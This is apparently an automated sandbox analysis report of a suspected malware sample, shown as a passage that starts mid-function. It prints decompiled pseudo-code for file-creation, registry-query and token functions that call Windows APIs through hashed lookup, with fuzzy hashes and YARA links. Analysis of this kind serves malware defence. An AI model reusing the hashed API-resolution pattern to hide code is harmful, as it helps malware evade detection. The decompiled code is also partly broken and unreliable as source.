						_v16 = 0;
						if(E6F4C3064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6F4BF828(_a8, _t15);
							if(E6F4C3064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6F4BF4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6f4c57b8
0x6f4c57b9
0x6f4c57bb
0x6f4c57c0
0x6f4c57c7
0x6f4c57cb
0x6f4c57cb
0x6f4c57cb
0x6f4c57cf
0x6f4c5815
0x6f4c5815
0x6f4c57d1
0x6f4c57d1
0x6f4c57d7
0x6f4c57e0
0x6f4c57e3
0x6f4c57fa
0x6f4c580b
0x6f4c580b
0x6f4c580d
0x6f4c5813
0x6f4c581e
0x6f4c5836
0x6f4c5856
0x6f4c5856
0x6f4c5858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f4c57d7
0x6f4c5860

APIs

RegQueryValueExA.KERNELBASE(?,6F4CD1F8,00000000,?,00000000,00000000,?,?,?,6F4CD1F8,?,6F4C5887,?,00000000,00000000), ref: 6F4C580B
RegQueryValueExA.KERNELBASE(?,6F4CD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6F4CD1F8,?,6F4C5887,?,00000000), ref: 6F4C5856

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 0cec95ce1e2f33f1e4975bb59932164e9552a19e9610ec4302a5ce64d86c6448
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: E311843920D305ABD610DA69DC80EAFBBE8DF45754F00951EB49897681EB21F840CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6F4C5B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6F4BD1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6F4BD6D0(__ecx, _t60);
					E6F4BCFF8(_t56,  *_t60);
					E6F4BCFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6F4C62B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6F4C3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6F4BC26C(_t40);
					if(E6F4BC280(_t40) != 0) {
						_t56[2] = E6F4C35F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6F4C3064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6F4C3698(_t59, 0xff, 8);
						if(E6F4C3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6f4c5b43
0x6f4c5b45
0x6f4c5b52
0x6f4c5b56
0x6f4c5b5a
0x6f4c5b64
0x6f4c5b6b
0x6f4c5b6b
0x6f4c5b72
0x6f4c5b74
0x6f4c5b79
0x6f4c5b82
0x6f4c5b8a
0x6f4c5b8a
0x6f4c5b7b
0x6f4c5b7d
0x6f4c5b7d
0x6f4c5b79
0x6f4c5b8f
0x6f4c5b9b
0x6f4c5ccc
0x6f4c5c09
0x6f4c5c12
0x6f4c5c13
0x6f4c5c18
0x6f4c5c19
0x6f4c5c0b
0x6f4c5c0d
0x6f4c5c0d
0x6f4c5c2f
0x6f4c5c43
0x6f4c5c31
0x6f4c5c3e
0x6f4c5c40
0x6f4c5c40
0x6f4c5c45
0x6f4c5c4a
0x6f4c5c58
0x6f4c5cc3
0x00000000
0x6f4c5c5a
0x6f4c5c5f
0x6f4c5cac
0x6f4c5cae
0x6f4c5cb0
0x6f4c5cba
0x6f4c5cba
0x6f4c5cb0
0x6f4c5c61
0x6f4c5c6d
0x6f4c5c86
0x6f4c5c88
0x6f4c5c89
0x6f4c5c8a
0x6f4c5c8c
0x6f4c5c8e
0x6f4c5c8f
0x6f4c5c8f
0x00000000
0x6f4c5c92
0x6f4c5ba1
0x6f4c5bb1
0x6f4c5bb1

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50bb8e074f45b3e4b716d066b756af36fdb3b6de1eb2c479e47eb5dcaa878e3d
Instruction ID: d147d3367ba494f9ce32ff2d28e1fb7fafd40809b67a18037e2527a862a68055
Opcode Fuzzy Hash: 50bb8e074f45b3e4b716d066b756af36fdb3b6de1eb2c479e47eb5dcaa878e3d
Instruction Fuzzy Hash: 2731293A344309BEE7102A794D85F3F769ADF81648F00543DFB4195A85EE21A915C2A3

Uniqueness

Uniqueness Score: -1.00%

Function 01031D4F, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 25%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				long _v48;
				int _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				int _t42;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E010323D8(__eflags);
				_t29 = L01031017();
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t31 =  *((intOrPtr*)(_v20 + 0x58))();
					_t56 = _t56 - 4;
					_v56 = _t31;
				}
				 *_t56 = _v20;
				_t33 = E01032172();
				 *_t56 = _v20;
				_v32 = _t33;
				_t34 = E0103129E(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x3c));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v36 = _t34;
				_v40 = _t53;
				_v44 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v40 + (_v44 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t42 = FreeConsole(); // executed
					_v52 = _t42;
				}
				 *_t56 = _v20;
				E01032341();
				 *_t56 = _v20; // executed
				E0103141B(_t47, _t54, _t55); // executed
				return 0;
			}

0x01031d58
0x01031d5b
0x01031d5e
0x01031d66
0x01031d69
0x01031d71
0x01031d74
0x01031dfe
0x01031e04
0x01031e07
0x01031e0a
0x01031e0a
0x01031d7d
0x01031d80
0x01031d88
0x01031d8b
0x01031d8e
0x01031d96
0x01031d99
0x01031d9c
0x01031da3
0x01031da5
0x01031da8
0x01031dab
0x01031dae
0x01031db1
0x01031df6
0x01031df6
0x01031e1a
0x01031dda
0x01031ddc
0x01031ddc
0x01031db8
0x01031dbb
0x01031dc3
0x01031dc6
0x01031dd4

APIs

FreeConsole.KERNELBASE ref: 01031DDA

Memory Dump Source

Source File: 00000000.00000002.749390798.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 51bccc7fd2a3aa5ef00824997dc36a3bee54b4d8b5c197c2067e043c88eb7ea9
Instruction ID: 20df2b08aae0ccc38b7b3223245a3d97097a82ce871c689e82f4d75b67480561
Opcode Fuzzy Hash: 51bccc7fd2a3aa5ef00824997dc36a3bee54b4d8b5c197c2067e043c88eb7ea9
Instruction Fuzzy Hash: 3C21D6B1E0420A9FCB44EFA9C8845EDBBF9FF8D310F144829D595A7340D7359891CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F4C1166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6f4c1168
0x6f4c116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F4C117B

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction ID: 225c52abe9c35db40dcced43e5b3d042c5a0b2ae32f63b5a67219b235d397a10
Opcode Fuzzy Hash: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction Fuzzy Hash: 38110A3C5042825AFB1695689850FFF76689FC2700F10586BE8A0F6EE4CA2CEC41C663

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F4C5BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6F4C3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6F4BC26C(_t24);
					if(E6F4BC280(_t24) != 0) {
						_t33[2] = E6F4C35F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6F4C3064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6F4C3698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6F4C3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6f4c5be5
0x6f4c5be7
0x6f4c5bfe
0x6f4c5c09
0x6f4c5c12
0x6f4c5c18
0x6f4c5c19
0x6f4c5c0b
0x6f4c5c0d
0x6f4c5c0d
0x6f4c5c2f
0x6f4c5c43
0x6f4c5c31
0x6f4c5c3e
0x6f4c5c40
0x6f4c5c40
0x6f4c5c45
0x6f4c5c4a
0x6f4c5c58
0x6f4c5cc3
0x6f4c5cc6
0x6f4c5c5a
0x6f4c5c5f
0x6f4c5cac
0x6f4c5cb0
0x6f4c5cba
0x6f4c5cba
0x6f4c5cb0
0x6f4c5c61
0x6f4c5c6d
0x6f4c5c72
0x6f4c5c86
0x6f4c5c88
0x6f4c5c89
0x6f4c5c8a
0x6f4c5c8c
0x6f4c5c8e
0x6f4c5c8f
0x6f4c5c8f
0x6f4c5c92
0x6f4c5c92
0x6f4c5be9
0x6f4c5be9
0x6f4c5bf0
0x6f4c5bf0
0x6f4c5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F4C5C3E

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 683e41d07867bb6638b5c2328d585f9b6daa0dcad2e0bed859fb4a0933cad517
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 3001263E284305BAF7102A784D41F7F7759DF41248F005839BB0165F85DB22B459C163

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6F4C5BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F4C3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F4BC26C(_t24);
				if(E6F4BC280(_t24) != 0) {
					_t34[2] = E6F4C35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6F4C3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6F4C3698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6F4C3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f4c5bbd
0x6f4c5bc1
0x6f4c5bc4
0x6f4c5bc7
0x6f4c5c09
0x6f4c5c12
0x6f4c5c18
0x6f4c5c19
0x6f4c5c0b
0x6f4c5c0d
0x6f4c5c0d
0x6f4c5c2f
0x6f4c5c43
0x6f4c5c31
0x6f4c5c3e
0x6f4c5c40
0x6f4c5c40
0x6f4c5c45
0x6f4c5c4a
0x6f4c5c58
0x6f4c5cc3
0x6f4c5cc6
0x6f4c5c5a
0x6f4c5c5f
0x6f4c5cac
0x6f4c5cb0
0x6f4c5cba
0x6f4c5cba
0x6f4c5cb0
0x6f4c5c61
0x6f4c5c6d
0x6f4c5c72
0x6f4c5c86
0x6f4c5c88
0x6f4c5c89
0x6f4c5c8a
0x6f4c5c8c
0x6f4c5c8e
0x6f4c5c8f
0x6f4c5c8f
0x6f4c5c92
0x6f4c5c92
0x6f4c5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F4C5C3E

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: e26febeac2a4a754336e9fdf673031d53c498e3b7d9c6546b62875ef62a350fa
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: BA01F53E384309BAFB1426784D41F7F7799DFC2658F01943ABB0165A85DF226855C162

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F4C5BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F4C3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F4BC26C(_t24);
				if(E6F4BC280(_t24) != 0) {
					_t34[2] = E6F4C35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6F4C3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6F4C3698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6F4C3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f4c5bd1
0x6f4c5bd8
0x6f4c5bdb
0x6f4c5c09
0x6f4c5c12
0x6f4c5c18
0x6f4c5c19
0x6f4c5c0b
0x6f4c5c0d
0x6f4c5c0d
0x6f4c5c2f
0x6f4c5c43
0x6f4c5c31
0x6f4c5c3e
0x6f4c5c40
0x6f4c5c40
0x6f4c5c45
0x6f4c5c4a
0x6f4c5c58
0x6f4c5cc3
0x6f4c5cc6
0x6f4c5c5a
0x6f4c5c5f
0x6f4c5cac
0x6f4c5cb0
0x6f4c5cba
0x6f4c5cba
0x6f4c5cb0
0x6f4c5c61
0x6f4c5c6d
0x6f4c5c72
0x6f4c5c86
0x6f4c5c88
0x6f4c5c89
0x6f4c5c8a
0x6f4c5c8c
0x6f4c5c8e
0x6f4c5c8f
0x6f4c5c8f
0x6f4c5c92
0x6f4c5c92
0x6f4c5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F4C5C3E

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 9235ffb3c672638c309db085951a9c99b377da0a6cf8947c75aeba1e8b3226da
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 1C01283E7803097AF71426794D41F7F734ADF81258F00543AFB01A5B8ADE266859C163

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F4C5BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F4C3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F4BC26C(_t23);
				if(E6F4BC280(_t23) != 0) {
					_t31[2] = E6F4C35F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F4C3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F4C3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F4C3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f4c5bb3
0x6f4c5bba
0x6f4c5c09
0x6f4c5c12
0x6f4c5c18
0x6f4c5c19
0x6f4c5c0b
0x6f4c5c0d
0x6f4c5c0d
0x6f4c5c2f
0x6f4c5c43
0x6f4c5c31
0x6f4c5c3e
0x6f4c5c40
0x6f4c5c40
0x6f4c5c45
0x6f4c5c4a
0x6f4c5c58
0x6f4c5cc3
0x6f4c5cc6
0x6f4c5c5a
0x6f4c5c5f
0x6f4c5cac
0x6f4c5cb0
0x6f4c5cba
0x6f4c5cba
0x6f4c5cb0
0x6f4c5c61
0x6f4c5c6d
0x6f4c5c72
0x6f4c5c86
0x6f4c5c88
0x6f4c5c89
0x6f4c5c8a
0x6f4c5c8c
0x6f4c5c8e
0x6f4c5c8f
0x6f4c5c8f
0x6f4c5c92
0x6f4c5c92
0x6f4c5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F4C5C3E

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 42b49f9128e32d69d374909f8f4896e71d99ffa96ba614e7835e8bd2c3349c5e
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 6D012F3E680309BAFB102A388D41F7F7349CF81258F00683ABB0165A89DE22B859C162

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F4C5C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F4C3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F4BC26C(_t23);
				if(E6F4BC280(_t23) != 0) {
					_t31[2] = E6F4C35F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F4C3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F4C3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F4C3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f4c5c01
0x6f4c5c05
0x6f4c5c09
0x6f4c5c12
0x6f4c5c18
0x6f4c5c19
0x6f4c5c0b
0x6f4c5c0d
0x6f4c5c0d
0x6f4c5c2f
0x6f4c5c43
0x6f4c5c31
0x6f4c5c3e
0x6f4c5c40
0x6f4c5c40
0x6f4c5c45
0x6f4c5c4a
0x6f4c5c58
0x6f4c5cc3
0x6f4c5cc6
0x6f4c5c5a
0x6f4c5c5f
0x6f4c5cac
0x6f4c5cb0
0x6f4c5cba
0x6f4c5cba
0x6f4c5cb0
0x6f4c5c61
0x6f4c5c6d
0x6f4c5c72
0x6f4c5c86
0x6f4c5c88
0x6f4c5c89
0x6f4c5c8a
0x6f4c5c8c
0x6f4c5c8e
0x6f4c5c8f
0x6f4c5c8f
0x6f4c5c92
0x6f4c5c92
0x6f4c5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F4C5C3E

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 4816764de0ef2b67ece2880c26126ac4d7a642ac47b66646c480e44748d6e2b4
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: D901423E280309BAFB102A784D41F7F774DCF81658F00583ABB0165B8ADF22B859C1A2

Uniqueness

Uniqueness Score: -1.00%

